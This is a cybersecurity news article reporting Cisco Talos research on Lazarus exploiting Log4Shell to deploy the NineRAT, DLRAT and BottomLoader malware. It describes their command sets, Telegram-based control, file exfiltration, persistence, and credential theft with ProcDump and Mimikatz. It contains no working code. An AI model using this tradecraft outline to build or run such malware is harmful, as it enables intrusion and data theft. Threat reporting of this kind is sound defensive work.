Lazarus Exploits Log4Shell Vulnerability to Deploy New Trojans

Cybersecurity experts have warned that the North Korean hacker group Lazarus continues to exploit the Log4Shell vulnerability (CVE-2021-44228), which was discovered two years ago. The group is now using this flaw to deploy three previously unknown malware families written in the D programming language (DLang).

According to Cisco Talos, the Log4Shell vulnerability is being used to deliver the NineRAT and DLRAT remote access trojans, as well as the BottomLoader malware loader. The use of DLang is rare in cybercriminal operations, and experts believe Lazarus intentionally chose it to evade detection.

This campaign, dubbed Operation Blacksmith, reportedly began around March 2023 and has targeted manufacturing, agricultural, and security companies worldwide.

NineRAT: A New Remote Access Trojan

NineRAT is the first of two new RATs developed by Lazarus. It uses the Telegram API to communicate with its command-and-control (C2) server, including receiving commands and exfiltrating files from compromised computers. NineRAT includes a dropper component responsible for persistence and launching the main malware binaries.

The malware supports the following commands via Telegram:

• info — Collect preliminary information about the infected system
• setmtoken — Set a token value
• setbtoken — Set a new bot token
• setinterval — Set the interval between requests to the Telegram channel
• setleep — Set the sleep period for the malware
• upgrade — Update to a new version
• exit — Terminate the malware
• uninstall — Remove itself from the system
• sendfile — Send a file from the infected machine to the C2 server

DLRAT: Trojan and Loader

The second malware, DLRAT, acts as both a trojan and a loader, allowing Lazarus to deploy additional payloads on compromised systems. DLRAT first executes hardcoded commands to gather system information (such as OS details and MAC address) and sends this data to its C2 server. The server then responds with the victim’s external IP address and one of the following commands:

• deleteme — Remove the malware using a BAT file
• download — Download files from a specified remote source
• rename — Rename files on the infected system
• iamsleep — Put the malware to sleep for a specified period
• upload — Upload files to the C2 server
• showurls — Not yet implemented

BottomLoader: Malware Loader

Cisco analysts also discovered BottomLoader, a malware loader that retrieves and executes payloads from a hardcoded URL using PowerShell. It achieves persistence by modifying the system’s Startup directory. BottomLoader also allows files to be transferred from the infected system to the C2 server, giving attackers additional operational flexibility.

Attack Details and Impact

The attacks identified by experts are linked to the critical Log4Shell vulnerability (CVE-2021-44228). Although more than two years have passed since its discovery and patching, Log4Shell remains a serious threat because many systems are still unpatched.

Lazarus targeted publicly accessible VMWare Horizon servers running vulnerable versions of the Log4j library, enabling remote code execution. After compromising a server, the hackers deployed a proxy tool for persistent access, executed reconnaissance commands, created new administrator accounts, and used credential theft tools such as ProcDump and MimiKatz.

In the second stage of the attack, the group deployed NineRAT as described above. Cisco analysts believe that Lazarus may be supplying other groups and clusters with data collected via NineRAT, as the malware sometimes performs repeated system fingerprinting, suggesting it may be gathering information for multiple threat actors.